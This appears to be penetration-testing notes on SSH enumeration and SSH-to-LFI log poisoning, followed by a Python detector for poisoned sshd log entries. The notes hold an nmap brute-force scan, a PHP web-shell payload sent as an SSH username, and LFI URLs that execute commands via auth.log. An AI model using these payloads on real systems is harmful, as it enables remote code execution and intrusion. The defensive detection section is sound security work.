SSH Enumeration

CheckList

Probably not useful unless you have uploaded a key somewhere or found a private key file. Sometimes useful for log file poisoning with LFI.

Log in and test SSH connectivity

SSH NMAP Scripts

nmap -sV -Pn -vv -p 22 --script ssh-auth-methods,ssh-brute,ssh-hostkey,ssh-publickey-acceptance,ssh-run,ssh2-enum-algos,sshv1 10.10.10.20

Code Execution through SSH/LFI

ssh '<?php system($_GET['cmd']); ?>'@10.10.10.10

After this, on the LFI you have discovered, just add the cmd parameter:
?cmd=id
&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=whoami
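
A defender-side check for the auth.log poisoning described above, as an added example that is not part of the original notes: it scans sshd log lines for login names that no real account would have, such as ones carrying PHP tags. The log lines are constructed samples, and the names `find_poisoning`, `SSHD_USER`, `LEGIT_NAME` and `SAMPLE` are assumptions made for this example.

```python
import re

# sshd records failed logins as "Invalid user <name> from <ip> port <n>" and
# "Failed password for [invalid user ]<name> from <ip> port <n> ssh2".
# <name> is attacker-controlled, so it is matched greedily: the real source
# address is always the LAST " from <ip> port <n>" on the line.
SSHD_USER = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for(?: invalid user)?) "
    r"(?P<user>.*) from (?P<ip>[0-9a-fA-F:.]+) port \d+"
)
# Conservative shape of a real Unix account name (optional trailing $).
LEGIT_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,31}\$?")


def find_poisoning(lines):
    """Return (source_ip, login_name, reason) for each suspicious sshd entry."""
    hits = []
    for line in lines:
        m = SSHD_USER.search(line)
        if not m:
            continue
        user = m.group("user")
        if LEGIT_NAME.fullmatch(user):
            continue  # ordinary failed login, not log injection
        reason = "php-tag" if "<?" in user else "unusual-characters"
        hits.append((m.group("ip"), user, reason))
    return hits


# Constructed sample lines in /var/log/auth.log format (not from a real host).
SAMPLE = [
    "Mar  3 10:01:12 web1 sshd[2211]: Invalid user deploy from 192.0.2.10 port 40022",
    "Mar  3 10:01:15 web1 sshd[2214]: Failed password for root from 192.0.2.10 port 40030 ssh2",
    "Mar  3 10:02:40 web1 sshd[2230]: Invalid user <?php system($_GET['cmd']); ?> from 192.0.2.77 port 51514",
    "Mar  3 10:02:41 web1 sshd[2230]: Failed password for invalid user <?php system($_GET['cmd']); ?> from 192.0.2.77 port 51514 ssh2",
    "Mar  3 10:05:02 web1 sshd[2301]: Invalid user a b from 198.51.100.4 port 33000",
]

if __name__ == "__main__":
    for ip, user, reason in find_poisoning(SAMPLE):
        print(f"{reason:20} {ip:15} {user!r}")
```

Detection is the fallback. If the web server account cannot read /var/log/auth.log, the log cannot be pulled in through the file-inclusion bug at all.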